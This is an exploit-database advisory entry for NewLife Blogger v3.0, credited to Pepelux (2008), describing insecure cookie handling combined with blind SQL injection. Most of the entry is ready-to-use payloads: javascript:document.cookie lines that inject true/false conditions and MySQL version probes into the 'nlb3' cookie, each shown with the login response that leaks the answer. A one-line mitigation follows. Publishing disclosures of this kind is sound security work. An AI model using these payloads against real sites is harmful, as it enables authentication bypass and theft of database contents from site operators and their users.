vendor:
NewLife Blogger
by:
Pepelux
7.5
CVSS
HIGH
Insecure Cookie Handling & SQL Injection
89
CWE
Product Name: NewLife Blogger
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:newlife_blogger:newlife_blogger:3.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability
True/false method to blind mysql injection. Examples: javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112" Response: You appears as logged in javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112" Response: You appears as not logged in javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112 Response: You appears as logged in if MySQL version is 4 javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112 Response: You appears as logged in if MySQL version is 5
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.
